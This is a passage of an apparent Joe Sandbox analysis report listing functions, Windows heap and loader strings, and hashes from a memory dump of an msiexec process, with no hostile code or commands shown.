1819->1771 1824 2214a8d9 1819->1824 1820->1775 1821->1762 1825 220ed59f-220ed5a3 1821->1825 1830 2214a8de 1824->1830 1825->1762 1825->1820 1826->1810 1838 220ed4b4-220ed4bd 1826->1838 1835 2214a8e8-2214a8ed 1830->1835 1837 220ed68f-220ed696 1832->1837 1833->1806 1835->1778 1837->1816 1838->1830 1839 220ed4c3-220ed4f2 call 22135130 call 220ed6aa 1838->1839 1839->1837 1844 220ed4f8-220ed4fe 1839->1844 1844->1837 1845 220ed504-220ed50a 1844->1845 1845->1778 1846 220ed510-220ed52c GetPEB call 22105e70 1845->1846 1846->1835 1849 220ed532-220ed54f call 220ed6aa 1846->1849 1852 220ed586-220ed58c 1849->1852 1853 220ed551-220ed556 1849->1853 1852->1774 1852->1806 1854 220ed55c-220ed584 call 22114d86 1853->1854 1855 2214a8f2-2214a8f7 1853->1855 1854->1852 1855->1854 1856 2214a8fd-2214a908 1855->1856 1856->1816
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                        • API String ID: 0-3532704233
                                                                        • Opcode ID: 27aac8cbd0b8509ee251c6aea4be64fc3768a1578fcdf4662aa6880ae6d1fa17
                                                                        • Instruction ID: d63bfd6729842d5d113377ec617b80d5ca015d443ac3b3bc4b021616c7c379c5
                                                                        • Opcode Fuzzy Hash: 27aac8cbd0b8509ee251c6aea4be64fc3768a1578fcdf4662aa6880ae6d1fa17
                                                                        • Instruction Fuzzy Hash: 57B189B29483519FC715CF24C990B5FBBE8EB88758F01492EF989D7240D734DA84EB92
                                                                        Function 22189179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                        • API String ID: 0-3063724069
                                                                        • Opcode ID: b16e708433a1d6b237e014b56a4be152094822df1afe8b2f1967063245bf9faa
                                                                        • Instruction ID: 8a518926db87078318399190ab2d5285577fc6db74c6894fc1693750633905bc
                                                                        • Opcode Fuzzy Hash: b16e708433a1d6b237e014b56a4be152094822df1afe8b2f1967063245bf9faa
                                                                        • Instruction Fuzzy Hash: C6D1E3B2885395AFE331CA60C9C4F9BB7E9AF94714F000929FA9497254D770CB048BD3
                                                                        Function 221A0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                        • API String ID: 0-1700792311
                                                                        • Opcode ID: 65fa63d8a43564e9010512a45800c669e14a984f9f2290711814d39c6d805746
                                                                        • Instruction ID: 51c4805e7141c953d2f863521088cdba876cf153bedc4ccd2d14069ea8f9d9b8
                                                                        • Opcode Fuzzy Hash: 65fa63d8a43564e9010512a45800c669e14a984f9f2290711814d39c6d805746
                                                                        • Instruction Fuzzy Hash: 3ED1AB39A80795DFCB01CFA8C461FAEBBF1FF5A304F058459E8499B252C7349A81DB54
                                                                        Function 220ED08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • @, xrefs: 220ED313
                                                                        • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 220ED0CF
                                                                        • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 220ED146
                                                                        • @, xrefs: 220ED2AF
                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 220ED2C3
                                                                        • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 220ED262
                                                                        • @, xrefs: 220ED0FD
                                                                        • Control Panel\Desktop\LanguageConfiguration, xrefs: 220ED196
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                        • API String ID: 0-1356375266
                                                                        • Opcode ID: 4d600e8eb39ac9dc05a58cce7ddba06b010385957bf5cdb8c61ff52991080842
                                                                        • Instruction ID: 333ce6576f267980d411a35a28a62103dbab267662626e881259e563e438f41d
                                                                        • Opcode Fuzzy Hash: 4d600e8eb39ac9dc05a58cce7ddba06b010385957bf5cdb8c61ff52991080842
                                                                        • Instruction Fuzzy Hash: 09A178B19483459FD321CF20C590F9FB7E8FB98719F004A2EF69996240D778DA48DB92
                                                                        Function 220EF172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-523794902
                                                                        • Opcode ID: 26304961cc82a7102296df350bb9b9f0b583395709b93b6056ed3503b424e26b
                                                                        • Instruction ID: 8d06738880cfd99798ddb517e7c855b07364ffea10f4a4e2ac50b17d63ca2b67
                                                                        • Opcode Fuzzy Hash: 26304961cc82a7102296df350bb9b9f0b583395709b93b6056ed3503b424e26b
                                                                        • Instruction Fuzzy Hash: 1B42EE716483819FC315CF28C584F5BBBE5BF94308F044A6DF99A8B252DB34DA81DB52
                                                                        Function 2210B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                        • API String ID: 0-122214566
                                                                        • Opcode ID: d777e7b82fa656f6106ec97b6ec43af61eedaf4fb9ad9330e279abddef7ccc36
                                                                        • Instruction ID: 01e4e55b1234051d1ad3467fe5e2a3969c70193a4320e36c1ea2627d4ecb6aa6
                                                                        • Opcode Fuzzy Hash: d777e7b82fa656f6106ec97b6ec43af61eedaf4fb9ad9330e279abddef7ccc36
                                                                        • Instruction Fuzzy Hash: 76C13471A80315ABDB148F64C880FBFBBA5AF55304F2541A9ED21AF291EB74DB84C391
                                                                        Function 221263FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-792281065
                                                                        • Opcode ID: 4002ffb8e3a9b93ebb036fa4037c2749568bc5ddf1f9184f4007e3024ff91e01
                                                                        • Instruction ID: c86fe36e48aa4d5f7bbd2d721224209324a6a36c0e83c7cf2225ce124c91d9ca
                                                                        • Opcode Fuzzy Hash: 4002ffb8e3a9b93ebb036fa4037c2749568bc5ddf1f9184f4007e3024ff91e01
                                                                        • Instruction Fuzzy Hash: 1B911271BC17A4DFE729CF90DD81FBE3BA0AB55758F100228E9106B2CAD7689B41C791
                                                                        Function 22122674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 22162178
                                                                        • RtlGetAssemblyStorageRoot, xrefs: 22162160, 2216219A, 221621BA
                                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 2216219F
                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 22162180
                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 221621BF
                                                                        • SXS: %s() passed the empty activation context, xrefs: 22162165
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                        • API String ID: 0-861424205
                                                                        • Opcode ID: 99b4c8a5e01bf9bf84276133ef08c466424c05e929d1605d63990241edbd4a2b
                                                                        • Instruction ID: d076509efbb645cb493a0bbf9c075165a2c749f9b5bdfeb2f45cd3f86dc44049
                                                                        • Opcode Fuzzy Hash: 99b4c8a5e01bf9bf84276133ef08c466424c05e929d1605d63990241edbd4a2b
                                                                        • Instruction Fuzzy Hash: E4310432BC53346BF7158A95CC80FBF7778DBA5694F010259BB14BB254D6B0AB00C6E1
                                                                        Function 2212C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 2212C6C3
                                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 221681E5
                                                                        • Loading import redirection DLL: '%wZ', xrefs: 22168170
                                                                        • LdrpInitializeProcess, xrefs: 2212C6C4
                                                                        • LdrpInitializeImportRedirection, xrefs: 22168177, 221681EB
                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 22168181, 221681F5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                        • API String ID: 0-475462383
                                                                        • Opcode ID: 836841b24b62c4310cee73b8ffde2088b5cb5eeb543d8d2e35031f70dbc81fb5
                                                                        • Instruction ID: 190868005b237a89467988cf4a928f9c122fcff1d4bbe62844d1cf7b60a1ed92
                                                                        • Opcode Fuzzy Hash: 836841b24b62c4310cee73b8ffde2088b5cb5eeb543d8d2e35031f70dbc81fb5
                                                                        • Instruction Fuzzy Hash: 553135717847559FC210DF68CD82E6B77E4EF94B14F010A68F9806B295D620EF04CBA2
                                                                        Function 221151EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • Kernel-MUI-Language-SKU, xrefs: 2211542B
                                                                        • Kernel-MUI-Number-Allowed, xrefs: 22115247
                                                                        • Kernel-MUI-Language-Disallowed, xrefs: 22115352
                                                                        • WindowsExcludedProcs, xrefs: 2211522A
                                                                        • Kernel-MUI-Language-Allowed, xrefs: 2211527B
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                        • API String ID: 0-258546922
                                                                        • Opcode ID: 02bfc5430424d627669a1a0793e63ec1c91d28ca5240be541d4f543ed5549418
                                                                        • Instruction ID: a0293f63adaea75c8149c07f338a38b8f0c63779d1d38ee8157bc957ac7ea041
                                                                        • Opcode Fuzzy Hash: 02bfc5430424d627669a1a0793e63ec1c91d28ca5240be541d4f543ed5549418
                                                                        • Instruction Fuzzy Hash: A9F138B2D91719EFCB16CF94C980EDEBBB9AF48750F51016AE511EB210E6749B01CBA0
                                                                        Function 2211D7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-1975516107
                                                                        • Opcode ID: ffd4357d0e89f3ea808ed91d351b5d7970f6955ea9d540f137c5a439b63ba862
                                                                        • Instruction ID: a2e2a711978ac05fa3999c655045eaa9ba99d303baf3e80adce90a5eceafc8ff
                                                                        • Opcode Fuzzy Hash: ffd4357d0e89f3ea808ed91d351b5d7970f6955ea9d540f137c5a439b63ba862
                                                                        • Instruction Fuzzy Hash: 8951BC71A80349DFDB14CFA4C980FDEBBF1BF48718F144169E9106B28AD775AA41CB80
                                                                        Function 220E76B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                        • API String ID: 0-3061284088
                                                                        • Opcode ID: d094e2453835d95774809c1102dac13f824595d37f08f6c0fb87684319919b18
                                                                        • Instruction ID: eca795b6312bc671c03b9a87a4a78d3d301aba750bcfc3f01d8da890ed12f4ea
                                                                        • Opcode Fuzzy Hash: d094e2453835d95774809c1102dac13f824595d37f08f6c0fb87684319919b18
                                                                        • Instruction Fuzzy Hash: CC019736A54390DEE2198B18D409FDA7BE8FB12730F24405AE009476A0CE68BEC0E160
                                                                        Function 221070C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                        • API String ID: 0-3178619729
                                                                        • Opcode ID: 5156517bde040de97428a839618905a7a4f9a7a92e7ca7f05c675c800f39da6e
                                                                        • Instruction ID: 1aad5e81f9f482088950a3e3cbab697771f99fc2a230c58d0c67ddadd4ff7dd5
                                                                        • Opcode Fuzzy Hash: 5156517bde040de97428a839618905a7a4f9a7a92e7ca7f05c675c800f39da6e
                                                                        • Instruction Fuzzy Hash: C513BC70A44759CFDB14CF68C980BE9BBF1BF58304F5581A9D859AB382D734AB42CB90
                                                                        Function 22101070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-3570731704
                                                                        • Opcode ID: 79293562c754ac211a130d18cc704cb3f1a209432ea8a1b5b186f04d4465e038
                                                                        • Instruction ID: 25c58a73b1e777dc2337f520e5bb80fbacc2bbe5d9b8047d8eb442639da04063
                                                                        • Opcode Fuzzy Hash: 79293562c754ac211a130d18cc704cb3f1a209432ea8a1b5b186f04d4465e038
                                                                        • Instruction Fuzzy Hash: 02923571A80368DFEB24CB24C980F99B7B6BF44314F0582EAE959A7251D7349F80CF51
                                                                        Function 220FA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                        • API String ID: 0-379654539
                                                                        • Opcode ID: b638dd95263611e99ebf51092b622a7a4562a36b91fb1064b14a183b58e218f5
                                                                        • Instruction ID: ce7e9c6dbdf631723676d4c6b2fc8414969962fa6bf87b95c30ef2b7066a3569
                                                                        • Opcode Fuzzy Hash: b638dd95263611e99ebf51092b622a7a4562a36b91fb1064b14a183b58e218f5
                                                                        • Instruction Fuzzy Hash: 47C1CD71188386CFC715CF16C540F9AB7E4FF84708F00896AF9958B261EB78DA49DB52
                                                                        Function 2212273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 221621D9, 221622B1
                                                                        • .Local, xrefs: 221228D8
                                                                        • SXS: %s() passed the empty activation context, xrefs: 221621DE
                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 221622B6
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                        • API String ID: 0-1239276146
                                                                        • Opcode ID: bd142edd5a9928165f4327bfcf685c59240583294c29902f7b09ef0a6fc7284f
                                                                        • Instruction ID: bd56e27f874dd1ed81116e0a4e8405ef4c908d20cdb683946162805bd6d42ee9
                                                                        • Opcode Fuzzy Hash: bd142edd5a9928165f4327bfcf685c59240583294c29902f7b09ef0a6fc7284f
                                                                        • Instruction Fuzzy Hash: DDA15C319817299BDB28CF54C984FE9B3B1BF58314F1142EAE958AB251D7B09F81CF90
                                                                        Function 220EF626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                        • API String ID: 0-2586055223
                                                                        • Opcode ID: 8ded986f9bd618be91726216be08907f4eee1725db42b2ff19d73b192911b1e8
                                                                        • Instruction ID: 5c8beaea3e07750d5839b9e425c74b077de0ef8eb2b2c04b84ba53c5fff5184a
                                                                        • Opcode Fuzzy Hash: 8ded986f9bd618be91726216be08907f4eee1725db42b2ff19d73b192911b1e8
                                                                        • Instruction Fuzzy Hash: 13610072285780AFD312CB24C948F5B77E8EF94714F080569FA998B292DB34DA41DB62
                                                                        Function 221A11A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
